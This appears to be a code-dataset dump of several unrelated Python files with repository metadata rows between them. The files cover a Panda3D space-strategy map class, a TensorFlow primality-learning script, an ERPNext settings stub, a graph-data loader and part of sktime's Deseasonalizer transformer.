    the _createIconSim() helper; their names and signatures are unchanged
    because createIndustrySims()/writeProdResources() look them up
    dynamically via getattr.
    """
    def __init__(self, path, mode, systemDict):
        self.systemDict = systemDict
        self.id = systemDict['id']
        self.empireID = systemDict['myEmpireID']
        # the owning empire's two theme colors
        self.color1 = globals.empires[int(self.empireID)]['color1']
        self.color2 = globals.empires[int(self.empireID)]['color2']
        rootsim.RootSim.__init__(self, path, 'planet%s' % self.empireID,
                                 'planet_sphere', 0)
        self.resourceSize = 0.25
        self.mode = mode
        self.game = mode.game
        # Text/icon handles start as None so clear/refresh methods can test
        # whether a widget exists yet.
        self.simCity = None
        self.textName = None
        self.textCityNum = None
        self.textAL = None
        self.textEC = None
        self.textIA = None
        self.simAL = None
        self.simEC = None
        self.simIA = None
        self.simRS = None
        self.simJS = None
        self.simMF = None
        self.simFA = None
        self.simMA = None
        self.simSY = None
        self.simMI = None
        self.simWG = None
        self.simAF = None
        self.simCM = None
        self.simSS = None
        self.simSC = None
        self.simDC = None
        self.simRC = None
        # sphere size grows with city count (40 cities == full size)
        self.scale = .5 + .5*(self.systemDict['cities']/40.0)
        self.x = systemDict['x']
        self.z = systemDict['y']
        self.y = 20
        self.createMySim()
        self.armadaPos = {}
        self.armyPos = {}
        self.warpedArmadaPos = {}
        self.warpedArmyPos = {}
        self.setPositions()
    def setPositions(self):
        """Recompute all fleet/army icon slot maps for this system."""
        self.armadaPos = {}
        self.armyPos = {}
        self.warpedArmadaPos = {}
        self.warpedArmyPos = {}
        self.setMyPositions()
        self.setWarpedPositions()
    def setMyPositions(self):
        """Assign a display slot (empireID -> column index) for each armada
        and army currently present at this system."""
        count = 0
        if self.id in self.game.myArmadas.keys():
            self.armadaPos[self.game.myEmpireID] = count
            count += 1
        if self.id in self.game.myArmies.keys():
            self.armyPos[self.game.myEmpireID] = count
            count += 1
        if self.id in self.game.otherArmadas.keys():
            for empireID in self.game.otherArmadas[self.id]:
                self.armadaPos[empireID] = count
                count += 1
        if self.id in self.game.otherArmies.keys():
            for empireID in self.game.otherArmies[self.id]:
                self.armyPos[empireID] = count
                count += 1
    def setWarpedPositions(self):
        """Assign display slots for my warped-in armadas/armies here."""
        count = 0
        if self.id in self.game.warpedArmadas.keys():
            self.warpedArmadaPos[self.game.myEmpireID] = count
            count += 1
        if self.id in self.game.warpedArmies.keys():
            self.warpedArmyPos[self.game.myEmpireID] = count
    def getMyArmadaPosition(self, empireID):
        """Return the (x, z) position System wants to place an Armada icon."""
        self.setMyPositions()
        x = self.x+1.15 + self.armadaPos[empireID]*0.35
        z = self.z+0.75
        return (x,z)
    def getMyWarpedArmadaPosition(self, empireID):
        """Return the (x, z) position for a warped Armada icon."""
        self.setWarpedPositions()
        x = self.x+1.3 + self.warpedArmadaPos[empireID]*0.35
        z = self.z-0.25
        return (x,z)
    def getMyArmyPosition(self, empireID):
        """Return the (x, z) position System wants to place an Army icon."""
        self.setMyPositions()
        x = self.x+1.15 + self.armyPos[empireID]*0.35
        z = self.z+0.75
        return (x,z)
    def getMyWarpedArmyPosition(self, empireID):
        """Return the (x, z) position for a warped Army icon."""
        self.setWarpedPositions()
        x = self.x+1.3 + self.warpedArmyPos[empireID]*0.35
        z = self.z-0.25
        return (x,z)
    def setColor(self):
        """Set the color of the sim (no-op for systems; hook for RootSim)."""
        pass
    def setGlow(self):
        """Does the object glow (no-op for systems; hook for RootSim)."""
        pass
    def createMySim(self):
        """Create the sphere and all surrounding labels/icons."""
        self.registerMySim()
        self.loadMyTexture()
        self.setGlow()
        self.setColor()
        self.setPos()
        self.writeName()
        self.writeCityNum()
        self.createExtras()
        self.rotateSim()
    def createExtras(self):
        """Display owner-only extras (resources, industry, capacity)."""
        if self.empireID == self.mode.game.myEmpireID:
            self.writeResources()
            self.writeProdResources()
            self.createIndustrySims()
            self.writeCitiesUsed()
    def writeCitiesUsed(self):
        """Overwrite the city counter with 'used/available'."""
        text = '%s/%s' % (self.systemDict['citiesUsed'], self.systemDict['cities'])
        self.textCityNum.myText.setText(text)
    def destroy(self):
        """Remove this system and all its labels/icons from the scene."""
        self.removeMyWidgets()
        self.sim.removeNode()
        self.clearText(self.textName)
        self.clearText(self.textCityNum)
        self.clearText(self.textAL)
        self.clearText(self.textEC)
        self.clearText(self.textIA)
    def writeName(self):
        """Write the system name above the sphere in the owner's color."""
        text = funcs.getSystemName(self.systemDict)
        self.clearText(self.textName)
        self.textName = textonscreen.TextOnScreen(self.path, text, 0.25, font=1)
        self.textName.writeTextToScreen(self.x-0.9, self.y, self.z+1, wordwrap=14)
        self.textName.setColor(globals.colors[self.color1])
    def writeCityNum(self):
        """Write the city count beside the empire crest (top-left)."""
        text = '%s' % self.systemDict['cities']
        self.createSimCity(globals.colors[self.color1])
        self.textCityNum = textonscreen.TextOnScreen(self.path, text, 0.20, font=1)
        self.textCityNum.writeTextToScreen(self.x-1.5, self.y-0.1, self.z+0.86, wordwrap=10)
        self.textCityNum.setColor(globals.colors[self.color1])
    def writeResources(self):
        """Display any available resources (writeXX helpers come from the
        RootSim base class)."""
        self.resourceCount = 0
        for resource in ['AL','EC','IA']:
            value = self.systemDict[resource]
            if value > 0:
                myMethod = getattr(self, 'write%s' % resource)
                myMethod(self.x, self.y+0.05, self.z-1.3-(0.3*self.resourceCount), value)
                self.resourceCount += 1
    def writeProdResources(self):
        """Display markers for resources currently being produced."""
        self.resourceCount = 0
        for resource in ['AL','EC','IA']:
            value = self.systemDict['prod%s' % resource]
            if value > 0:
                myMethod = getattr(self, 'createSim%s' % resource)
                myMethod(self.x-0.25, self.y+0.05, self.z-1.25-(0.3*self.resourceCount))
                self.resourceCount += 1
    def _createIconSim(self, textureFile, scale, color, x, y, z):
        """Load one textured billboard plane, position/tint it, register it
        in self.myWidgets for cleanup, and return it."""
        sim = loader.loadModelCopy('%s/plane' % self.path)
        sim.setScale(scale)
        sim.reparentTo(render)
        sim.setTransparency(1)
        tex = loader.loadTexture('%s/%s' % (self.path, textureFile))
        sim.setTexture(tex, 0)
        sim.setPos(x, y, z)
        sim.setColor(color)
        self.myWidgets.append(sim)
        return sim
    def createSimAL(self, x, y, z):
        """AL production marker (blue resource icon) at an absolute position."""
        self.simAL = self._createIconSim('resource.png', 0.2,
                                         globals.colors['guiblue2'], x, y, z)
    def createSimEC(self, x, y, z):
        """EC production marker (yellow resource icon)."""
        self.simEC = self._createIconSim('resource.png', 0.2,
                                         globals.colors['guiyellow'], x, y, z)
    def createSimIA(self, x, y, z):
        """IA production marker (red resource icon)."""
        self.simIA = self._createIconSim('resource.png', 0.2,
                                         globals.colors['guired'], x, y, z)
    def createSimCity(self, color):
        """Empire crest shown beside the city counter (top-left)."""
        self.simCity = self._createIconSim('empire%s.png' % self.empireID, 0.4,
                                           color, self.x-1.25, self.y+0.05, self.z+1.28)
    def _createIndustryIcon(self, textureFile, color, count, row2=False, scale=0.25):
        """Place one industry icon in the first (row2=False) or second
        (row2=True) icon row and return it."""
        if row2:
            (x, z) = self.getIndustryPosition2(count)
        else:
            (x, z) = self.getIndustryPosition(count)
        return self._createIconSim(textureFile, scale, color,
                                   self.x+x, self.y+0.05, self.z+z)
    def createSimAF(self, color, count):
        """Academy of Fleet icon (second row)."""
        self.simAF = self._createIndustryIcon('af.png', color, count, row2=True)
    def createSimCM(self, color, count):
        """CM industry icon (second row)."""
        self.simCM = self._createIndustryIcon('cm.png', color, count, row2=True)
    def createSimSS(self, color, count):
        """SS industry icon (second row)."""
        self.simSS = self._createIndustryIcon('ss.png', color, count, row2=True)
    def createSimSC(self, color, count):
        """SC industry icon (second row)."""
        self.simSC = self._createIndustryIcon('sc.png', color, count, row2=True)
    def createSimDC(self, color, count):
        """DC industry icon (second row)."""
        self.simDC = self._createIndustryIcon('dc.png', color, count, row2=True)
    def createSimRC(self, color, count):
        """RC industry icon (second row)."""
        self.simRC = self._createIndustryIcon('rc.png', color, count, row2=True)
    def createSimWG(self, color, count):
        """Warp Gate icon (first row)."""
        self.simWG = self._createIndustryIcon('wg.png', color, count)
    def createSimMA(self, color, count):
        """MA industry icon (first row)."""
        self.simMA = self._createIndustryIcon('ma.png', color, count)
    def createSimFA(self, color, count):
        """FA industry icon (first row)."""
        self.simFA = self._createIndustryIcon('fa.png', color, count)
    def createSimMF(self, color, count):
        """MF industry icon (first row)."""
        self.simMF = self._createIndustryIcon('mf.png', color, count)
    def createSimJS(self, color, count):
        """JS industry icon (first row)."""
        self.simJS = self._createIndustryIcon('js.png', color, count)
    def createSimRS(self, color, count):
        """RS industry icon (first row)."""
        self.simRS = self._createIndustryIcon('rs.png', color, count)
    def createSimSY(self, color, count):
        """Shipyard icon; tinted by whether shipyard capacity is in use."""
        color = self.getFunctionalColor(color, self.systemDict['usedSYC'])
        self.simSY = self._createIndustryIcon('sy.png', color, count)
    def createSimMI(self, color, count):
        """Military Installation icon; tinted by used MI capacity.
        Drawn slightly smaller (0.2) than the other first-row icons,
        matching the original layout."""
        color = self.getFunctionalColor(color, self.systemDict['usedMIC'])
        self.simMI = self._createIndustryIcon('mi.png', color, count, scale=0.2)
    def getIndustryPosition2(self, count):
        """(x, z) offset for the count-th icon in the second icon row
        (three per line, wrapping down-left)."""
        if count <= 2:
            x = -1.1 -count*0.3
            z = -0.6
        else:
            num = count - 3
            x = -1.3 -num*0.3
            z = -0.2
        return (x,z)
    def getIndustryPosition(self, count):
        """(x, z) offset for the count-th icon in the first icon row
        (four per line, wrapping down-left)."""
        if count <= 3:
            x = -1.1 -count*0.3
            z = 0.7
        else:
            num = count - 4
            x = -1.3 -num*0.3
            z = 0.3
        return (x,z)
    def getFunctionalColor(self, color, capacityUsed):
        """White means 'idle'; turn it yellow when capacity is in use.
        Non-white (future add/remove) colors are passed through."""
        if color != globals.colors['guiwhite']:
            return color
        if capacityUsed > 0:
            return globals.colors['guiyellow']
        return globals.colors['guiwhite']
    def clearIndustrySims(self):
        """Remove all industry indicator sims.

        Bug fixed: the attribute is reset to None after removeNode() so a
        later refresh cannot call removeNode() twice on a stale handle.
        """
        for id in funcs.sortStringList(self.mode.game.industrydata.keys()):
            code = self.mode.game.industrydata[id].abr[1:]
            sim = getattr(self, 'sim%s' % code)
            if sim != None:
                sim.removeNode()
                setattr(self, 'sim%s' % code, None)
    def createIndustrySims(self):
        """Create an icon for every industry type that exists now or will
        exist next round; shipyard capacity without a shipyard still gets a
        white SY icon."""
        count = 0
        count2 = 0
        hasSY = 0
        for id in funcs.sortStringList(self.mode.game.industrydata.keys()):
            oldNum = self.systemDict['myOldIndustry'][id]
            newNum = self.systemDict['myIndustry'][id]
            if oldNum > 0 or newNum > 0:
                code = self.mode.game.industrydata[id].abr[1:]
                # color encodes being added/removed/unchanged next round
                color = funcs.getFutureColor(newNum, oldNum)
                if code == 'SY':
                    hasSY = 1
                if code not in ['AF', 'CM', 'SS', 'SC', 'DC', 'RC']:
                    myMethod = getattr(self, 'createSim%s' % code)
                    myMethod(color, count)
                    count += 1
                else:
                    myMethod = getattr(self, 'createSim%s' % code)
                    myMethod(color, count2)
                    count2 += 1
        if hasSY == 0 and self.systemDict['availSYC'] > 0:
            self.createSimSY(globals.colors['guiwhite'], count)
    def rotateSim(self):
        """Spin the sphere continuously (one revolution per 25s)."""
        ival = self.sim.hprInterval((25.0), Vec3(360, 0, 0))
        ival.loop() # keep the rotation going
    def refreshResources(self):
        """Redraw the resource text after the system dict changes."""
        self.clearText(self.textAL)
        self.clearText(self.textEC)
        self.clearText(self.textIA)
        self.writeResources()
    def refreshIndustrySims(self):
        """Redraw the industry icons (owner only)."""
        if self.empireID == self.mode.game.myEmpireID:
            self.clearIndustrySims()
            self.createIndustrySims()
    def getGenResources(self):
        """Return future generation of resources as (AL, EC, IA)."""
        # Imported locally to avoid a circular import at module load time.
        from anw.gui import systemindustry
        systemindustrygui = systemindustry.SystemIndustry(self.path, self.systemDict, self.mode.game.myEmpire,
                                                          self.mode.game.industrydata, 0)
        systemindustrygui.setMyMode(self.mode)
        return systemindustrygui.getCurrentProduction()
    def refreshGenTradeRoute(self):
        """Refresh any GEN trade route coming from this system."""
        if self.game.mode.name == 'MAP':
            for tradeRouteID, tradeRouteDict in self.game.tradeRoutes.iteritems():
                if tradeRouteDict['fromSystem'] == self.id and tradeRouteDict['type'] == 'GEN':
                    self.game.mode.traderoutes[tradeRouteID].refreshResources()
class BackgroundSystem(System):
    """A Background System that is not clickable, just for viewing.

    Overrides createMySim() with a no-op so System.__init__ does not build
    the interactive widgets, then builds a large, slowly rotating sphere at
    a fixed background position instead.
    """
    def __init__(self, path, mode, systemDict,glow=1):
        System.__init__(self, path, mode, systemDict)
        # fixed oversized placement behind the map
        self.scale = 10
        self.y = 50
        self.x = 30
        self.z = 30
        self.createMyBackgroundSim(glow)
    def createMySim(self):
        # Intentionally empty: suppresses the interactive build done by
        # System.__init__; createMyBackgroundSim() runs afterwards instead.
        pass
    def createMyBackgroundSim(self, glow=1):
        """Build the sphere only (no labels/icons); glow is optional."""
        self.registerMySim()
        self.loadMyTexture()
        if glow == 1:
            self.setGlow()
        self.setColor()
        self.setPos()
        #self.writeName()
        #self.writeCityNum()
        self.rotateSim()
    def rotateSim(self):
        # Much slower spin than System (180s per revolution vs 25s).
        ival = self.sim.hprInterval((180.0), Vec3(360, 0, 0))
        ival.loop() # keep the rotation going
    def setPositions(self):
        # Background systems host no fleets/armies; nothing to lay out.
        pass
    def writeName(self):
        """Write the system name, appending used/available warp-gate
        capacity when the dict carries an availWGC entry."""
        if 'availWGC' in self.systemDict.keys():
            availWGC = self.systemDict['availWGC']
            if availWGC != 0:
                text = '%s -> (%d/%d)' % (self.systemDict['name'], self.systemDict['usedWGC'], availWGC)
            else:
                text = self.systemDict['name']
        else:
            text = self.systemDict['name']
        self.clearText(self.textName)
        self.textName = textonscreen.TextOnScreen(self.path, text, 8, font=1)
        self.textName.writeTextToScreen(self.x-20, self.y, self.z+20, wordwrap=14)
        self.textName.setColor(globals.colors[self.color1])
    def writeCityNum(self):
        """Write the city count and empire crest at background scale."""
        text = '%s' % self.systemDict['cities']
        self.createSimCity(globals.colors[self.color1])
        self.textCityNum = textonscreen.TextOnScreen(self.path, text, 10, font=1)
        self.textCityNum.writeTextToScreen(self.x-29, self.y, self.z+13, wordwrap=10)
        self.textCityNum.setColor(globals.colors[self.color1])
if __name__ == "__main__":
    # Ad-hoc smoke test: build one System and start the Panda3D main loop
    # (run() comes from DirectStart's injected globals).
    # NOTE(review): passing mode=None will fail in System.__init__
    # (self.game = mode.game) -- this demo presumably predates that
    # attribute; confirm before relying on it.
    mediaPath = 'media'
    mySystemDict = {'id':'1', 'name':'Test System', 'x':0, 'y':0, 'myEmpireID':'1', 'cities':15}
    system1 = System(mediaPath, None, mySystemDict)
    run()
"chrislewis@pop-os.localdomain"
] | chrislewis@pop-os.localdomain |
330964458b683417af13bb09e391dae363e3ee81 | 32e70912e65f34886dc89297e2551059703fa28f | /primes.py | f69e47351d60b120cfe85ee5321af83d3a9eea64 | [] | no_license | kaa-the-snake/tf_basics | 39bf01a3c9684e6eea88b378d766c8784d32576d | d377c585918d2eadaf38a51399e711ba9f34bbbf | refs/heads/master | 2021-01-25T05:57:34.651752 | 2017-02-01T20:08:31 | 2017-02-01T20:08:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,926 | py | #!/usr/bin/python
import tensorflow as tf
import numpy as np
import random
def eratosphen(n):
    """Sieve of Eratosthenes.

    Args:
        n: exclusive upper bound (non-negative).

    Returns:
        (primes, mask): the list of primes below n, and a boolean list where
        mask[k] is True iff k is prime.

    Bug fixed: the original left mask[0] and mask[1] as True, so downstream
    generate_data() labeled 0 and 1 as primes.  (xrange was also replaced by
    range, which behaves identically here under both Python 2 and 3.)
    """
    res, mask = [], [True] * n
    for i in range(min(n, 2)):
        mask[i] = False  # 0 and 1 are not prime
    for i in range(2, n):
        if not mask[i]:
            continue
        res.append(i)
        for j in range(2 * i, n, i):
            mask[j] = False
    return res, mask
def generate_data(bits):
    """Build the full primality truth table over `bits`-bit integers.

    Args:
        bits: number of binary digits per sample.

    Returns:
        (x, y): x of shape (2**bits, bits, 1) holds the little-endian binary
        digits of each integer k; y of shape (2**bits, 1) is 1.0 when k is
        prime per the eratosphen() mask, else 0.0.

    Improvements: np.zeros replaces np.ndarray (which leaves memory
    uninitialized -- every cell was written anyway, but zeros is safer);
    `n //= 2` replaces `n /= 2` so the digit extraction also works under
    Python 3 (identical integer behavior under Python 2).
    """
    x = np.zeros([2 ** bits, bits, 1], np.float32)
    y = np.zeros([2 ** bits, 1], np.float32)
    _, mask = eratosphen(2 ** bits)
    for k in range(2 ** bits):
        n = k
        for i in range(bits):
            x[k][i][0] = n % 2
            n //= 2  # floor division keeps n an int on Python 3
        y[k][0] = 1.0 if mask[k] else 0.0
    return x, y
# do all stuff
def main():
    """Train a GRU to classify 16-bit integers as prime/composite.

    Uses the TensorFlow 1.x graph API and Python 2 print syntax; trains on
    the full 2**16 truth table until the L2 loss drops below eps.
    """
    # hyper-parameters: sequence length (bits), GRU width, stop loss, lr
    max_time, state_size, eps, learning_rate = 16, 32, 0.01, 0.001
    gru = tf.nn.rnn_cell.GRUCell(state_size)
    # readout layer mapping the final GRU state to one logit
    w = tf.Variable(tf.random_normal([state_size, 1]))
    b = tf.Variable(tf.random_normal([1]))
    # create learning graph: one binary digit per timestep
    x = tf.placeholder(tf.float32, [None, max_time, 1])
    with tf.variable_scope('train'):
        output, state = tf.nn.dynamic_rnn(gru, x, dtype = tf.float32)
    y = tf.placeholder(tf.float32, [None, 1])
    # keep only the last timestep's output as the sequence summary
    output = output[:, max_time - 1, :]
    output = tf.sigmoid(tf.add(tf.matmul(output, w), b))
    #output = tf.add(tf.matmul(output, w), b)
    # define loss and optimizer (L2 on sigmoid outputs; the commented
    # alternative is the cross-entropy-on-logits variant)
    loss = tf.nn.l2_loss(tf.subtract(output, y))
    #loss = tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(output, y))
    optimizer = tf.train.AdamOptimizer(learning_rate = learning_rate).minimize(loss)
    # begin training: full-batch gradient descent on the whole truth table
    init = tf.global_variables_initializer()
    sess = tf.Session()
    sess.run(init)
    cnt = 0
    data_x, data_y = generate_data(max_time)
    while True:
        # res (the optimizer op's None result) is unused; l is the loss
        res, l = sess.run([optimizer, loss], feed_dict = {x: data_x, y: data_y})
        print l
        cnt += 1
        if l <= eps:
            break
# entry point
if __name__ == "__main__":
main()
| [
"accs@vnik.me"
] | accs@vnik.me |
fbac00a832f23f89bb0f12e137cb3464bdaf6864 | eb051a9dd600024c54a81fae9e90b8bd1d54db4d | /erpnext_prime/erpnext_prime/doctype/prime_settings/prime_settings.py | 609dd37624ab68e45cd56773dcc8fc2b7e0b4e7d | [
"MIT"
] | permissive | techlift-tech/erpnext_prime | ce0fbc40797506d3e5194aa8da78106b808c6181 | 73e53e557eea9c46ba2caffdc983c630f00b643d | refs/heads/master | 2021-06-26T19:44:18.060729 | 2020-11-04T06:15:04 | 2020-11-04T06:15:04 | 183,427,158 | 0 | 1 | NOASSERTION | 2020-03-05T09:49:33 | 2019-04-25T12:11:31 | Python | UTF-8 | Python | false | false | 281 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2019, Techlift Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class PrimeSettings(Document):
pass
| [
"palash@techlift.in"
] | palash@techlift.in |
2266c46d52769f067fd7f36262c25992404375db | 7d14cc8ffbc34b149981889fa1b3786b803b25b2 | /32_Inheritance.py | f1edc058e265e7deb0432da9d51a6dea024301a9 | [] | no_license | lcanalest/python_for_beginners | 30bfbdbb75b7ac0d753acb218c9b41789966929b | 9bdae7f8b33fe8ca25a6481ccc2e88bcfec65fab | refs/heads/master | 2020-12-21T09:44:13.844493 | 2020-01-28T17:34:04 | 2020-01-28T17:34:04 | 236,389,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | # Inheritance (4:12:38)
from Chef import Chef
from ChineseChef import ChineseChef
normal_chef = Chef()
chinese_chef = ChineseChef()
normal_chef.make_chicken()
chinese_chef.make_chicken()
normal_chef.make_special_dish()
chinese_chef.make_special_dish() | [
"luis.canalest@gmail.com"
] | luis.canalest@gmail.com |
0ad030301724d26610e72fab67a331ea0cc126de | d41734a461b032d95cde30bf07061d4bc8e00b5b | /Code/utils.py | 75ed3cc7594753085975cd4f406f5d7e67d30c48 | [] | no_license | KamranMK/MG2Vec- | 65855f64b81e154631cf0d21cd8be625ed92c3f5 | 4662753bf42c295e8d8ce3a595aab46f8a5f0c4c | refs/heads/master | 2023-07-11T15:03:16.578057 | 2020-09-15T08:03:48 | 2020-09-15T08:03:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,994 | py | import numpy as np
import scipy.sparse as sp
import torch
def encode_onehot(labels):
    """One-hot encode a sequence of class labels.

    Args:
        labels: iterable of hashable, mutually comparable class labels.

    Returns:
        int32 array of shape (len(labels), n_classes).

    Improvement: classes are sorted so the column order is deterministic
    across runs -- iterating a plain set() yields an arbitrary,
    hash-dependent order, which made encodings irreproducible.
    """
    classes = sorted(set(labels))
    classes_dict = {c: np.identity(len(classes))[i, :] for i, c in enumerate(classes)}
    labels_onehot = np.array(list(map(classes_dict.get, labels)), dtype=np.int32)
    return labels_onehot
def load_data(path="./", dataset="cora"):
    """Load citation network dataset (cora only for now)

    Reads node ids/features from ``node_features_EU.txt`` and an edge list from
    ``<path>Train_EU_layer0.cites``, builds a symmetrically normalized adjacency
    matrix and row-normalized features, and returns dense torch tensors plus a
    stack of per-layer adjacencies from ``target_L.npz``.
    NOTE(review): despite the ``path``/``dataset`` parameters, the feature file
    and .npz names are hard-coded -- confirm which inputs are intended.
    """
    print('Loading {} dataset...'.format(dataset))
    # idx_features_labels = np.genfromtxt("{}{}.content".format(path, dataset), dtype=np.dtype(str))
    # Each row: node id, feature columns..., label (the label column is unused here).
    idx_features_labels = np.genfromtxt("node_features_EU.txt", dtype=np.dtype(str))
    features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)
    # labels = encode_onehot(idx_features_labels[:, -1])
    # build graph
    idx = np.array(idx_features_labels[:, 0], dtype=np.int32)
    # Map raw node ids to consecutive row indices 0..n-1.
    idx_map = {j: i for i, j in enumerate(idx)}
    edges_unordered = np.genfromtxt("{}{}.cites".format(path, "Train_EU_layer0"), dtype=np.int32)
    # edges_unordered = np.genfromtxt("{}{}.cites".format(path, dataset), dtype=np.int32)
    edges = np.array(list(map(idx_map.get, edges_unordered.flatten())), dtype=np.int32).reshape(edges_unordered.shape)
    adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])), shape=(features.shape[0], features.shape[0]), dtype=np.float32)
    # build symmetric adjacency matrix
    adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)
    features = normalize_features(features)
    adj = normalize_adj(adj + sp.eye(adj.shape[0]))
    # All nodes are used for training.
    idx_train = range(idx.size)
    adj = torch.FloatTensor(np.array(adj.todense()))
    features = torch.FloatTensor(np.array(features.todense()))
    # labels = torch.LongTensor(np.where(labels)[1])
    # NOTE(review): np.load on an .npz returns an NpzFile whose iteration yields
    # key strings, not arrays, so sp.coo_matrix over it looks broken -- verify
    # against the actual contents of target_L.npz.
    adj_L = sp.coo_matrix([sp.coo_matrix(mat) for mat in np.load("target_L.npz")])
    # Inside the comprehensions below, ``adj`` is rebound to each layer matrix.
    adj_L = [adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj) for adj in adj_L]
    adj_L = [normalize_adj(adj + sp.eye(adj.shape[0])) for adj in adj_L]
    # NOTE(review): torch.FloatTensor of a list of tensors fails on modern torch;
    # torch.stack is the usual way to combine them -- confirm intent.
    adj_L = torch.FloatTensor([torch.FloatTensor(np.array(adj.todense())) for adj in adj_L])
    idx_train = torch.LongTensor(idx_train)
    return adj,adj_L, features, idx_train
    # return adj, features, labels, idx_train, idx_val, idx_test
def normalize_adj(mx):
    """Symmetrically normalize a sparse adjacency matrix: D^{-1/2} A D^{-1/2}."""
    degree = np.array(mx.sum(1))
    d_inv_sqrt = np.power(degree, -0.5).flatten()
    # zero-degree rows produce inf; map them back to zero so they stay isolated
    d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.0
    d_mat_inv_sqrt = sp.diags(d_inv_sqrt)
    return mx.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt)
def normalize_features(mx):
    """Row-normalize a sparse matrix so each row sums to 1 (all-zero rows stay zero)."""
    row_totals = np.array(mx.sum(1))
    inv_totals = np.power(row_totals, -1).flatten()
    # rows summing to zero yield inf; reset them so those rows remain zero
    inv_totals[np.isinf(inv_totals)] = 0.0
    mx = sp.diags(inv_totals).dot(mx)
    return mx
def accuracy(output, labels):
    """Fraction of rows whose argmax over dim 1 matches labels (0-d double tensor)."""
    predicted = output.max(1)[1].type_as(labels)
    n_correct = predicted.eq(labels).double().sum()
    return n_correct / len(labels)
"noreply@github.com"
] | KamranMK.noreply@github.com |
c5d0d0c338ada160cfe71dbf39008f8f29b820c2 | b347bc4b850dee4a8a9a171b563a3f31230ce1c7 | /sktime/transformations/series/detrend/_deseasonalize.py | a0bab72194a91c2333d9664f368666d36ad498a6 | [
"BSD-3-Clause"
] | permissive | sktime/sktime | 5963962df338c5931a2f9f1794d1203c50ddc27e | 70b2bfaaa597eb31bc3a1032366dcc0e1f4c8a9f | refs/heads/main | 2023-08-22T18:20:08.022950 | 2023-08-22T15:24:39 | 2023-08-22T15:24:39 | 156,401,841 | 1,117 | 268 | BSD-3-Clause | 2023-09-14T20:44:21 | 2018-11-06T15:08:24 | Python | UTF-8 | Python | false | false | 21,903 | py | #!/usr/bin/env python3 -u
# copyright: sktime developers, BSD-3-Clause License (see LICENSE file)
"""Implements transformations to deseasonalize a timeseries."""
__author__ = ["mloning", "eyalshafran", "aiwalter"]
__all__ = ["Deseasonalizer", "ConditionalDeseasonalizer", "STLTransformer"]
import numpy as np
import pandas as pd
from sktime.transformations.base import BaseTransformer
from sktime.utils.datetime import _get_duration, _get_freq
from sktime.utils.seasonality import autocorrelation_seasonality_test
from sktime.utils.validation.forecasting import check_sp
class Deseasonalizer(BaseTransformer):
    """Remove seasonal components from a time series.

    Applies `statsmodels.tsa.seasonal.seasonal_decompose` and removes the
    `seasonal` component in `transform`. Adds seasonal component back again in
    `inverse_transform`. Seasonality removal can be additive or multiplicative.

    `fit` computes :term:`seasonal components <Seasonality>` and
    stores them in the `seasonal_` attribute.

    `transform` aligns seasonal components stored in `seasonal_` with
    the time index of the passed :term:`series <Time series>` and then
    subtracts them ("additive" model) from the passed :term:`series <Time series>`
    or divides the passed series by them ("multiplicative" model).

    Parameters
    ----------
    sp : int, default=1
        Seasonal periodicity.
    model : {"additive", "multiplicative"}, default="additive"
        Model to use for estimating seasonal component.

    Attributes
    ----------
    seasonal_ : array of length sp
        Seasonal components computed in seasonal decomposition.

    See Also
    --------
    ConditionalDeseasonalizer

    Notes
    -----
    For further explanation on seasonal components and additive vs.
    multiplicative models see
    `Forecasting: Principles and Practice <https://otexts.com/fpp3/components.html>`_.
    Seasonal decomposition is computed using `statsmodels
    <https://www.statsmodels.org/stable/generated/statsmodels.tsa.seasonal.seasonal_decompose.html>`_.

    Examples
    --------
    >>> from sktime.transformations.series.detrend import Deseasonalizer
    >>> from sktime.datasets import load_airline
    >>> y = load_airline()  # doctest: +SKIP
    >>> transformer = Deseasonalizer()  # doctest: +SKIP
    >>> y_hat = transformer.fit_transform(y)  # doctest: +SKIP
    """

    _tags = {
        "scitype:transform-input": "Series",
        # what is the scitype of X: Series, or Panel
        "scitype:transform-output": "Series",
        # what scitype is returned: Primitives, Series, Panel
        "scitype:instancewise": True,  # is this an instance-wise transform?
        "X_inner_mtype": "pd.Series",
        # which mtypes do _fit/_predict support for X?
        "y_inner_mtype": "None",  # which mtypes do _fit/_predict support for y?
        "fit_is_empty": False,
        "capability:inverse_transform": True,
        "transform-returns-same-time-index": True,
        "univariate-only": True,
        "python_dependencies": "statsmodels",
    }

    def __init__(self, sp=1, model="additive"):
        self.sp = check_sp(sp)
        allowed_models = ("additive", "multiplicative")
        if model not in allowed_models:
            raise ValueError(
                f"`model` must be one of {allowed_models}, " f"but found: {model}"
            )
        self.model = model
        self._X = None
        self.seasonal_ = None
        super().__init__()

    def _align_seasonal(self, X):
        """Align seasonal components with X's time index."""
        # Shift the stored one-cycle seasonal pattern to the phase of X's first
        # timestamp relative to the training series, then tile it to len(X).
        shift = (
            -_get_duration(
                X.index[0],
                self._X.index[0],
                coerce_to_int=True,
                unit=_get_freq(self._X.index),
            )
            % self.sp
        )
        return np.resize(np.roll(self.seasonal_, shift=shift), X.shape[0])

    def _fit(self, X, y=None):
        """Fit transformer to X and y.

        private _fit containing the core logic, called from fit

        Parameters
        ----------
        X : pd.Series
            Data to fit transform to
        y : ignored argument for interface compatibility

        Returns
        -------
        self: a fitted instance of the estimator
        """
        from statsmodels.tsa.seasonal import seasonal_decompose

        self._X = X
        sp = self.sp

        # apply seasonal decomposition; only the first full cycle of the
        # seasonal component is stored (it repeats with period sp)
        self.seasonal_ = seasonal_decompose(
            X,
            model=self.model,
            period=sp,
            filt=None,
            two_sided=True,
            extrapolate_trend=0,
        ).seasonal.iloc[:sp]
        return self

    def _private_transform(self, y, seasonal):
        # remove seasonality: subtract for additive, divide for multiplicative
        if self.model == "additive":
            return y - seasonal
        else:
            return y / seasonal

    def _private_inverse_transform(self, y, seasonal):
        # re-apply seasonality: add for additive, multiply for multiplicative
        if self.model == "additive":
            return y + seasonal
        else:
            return y * seasonal

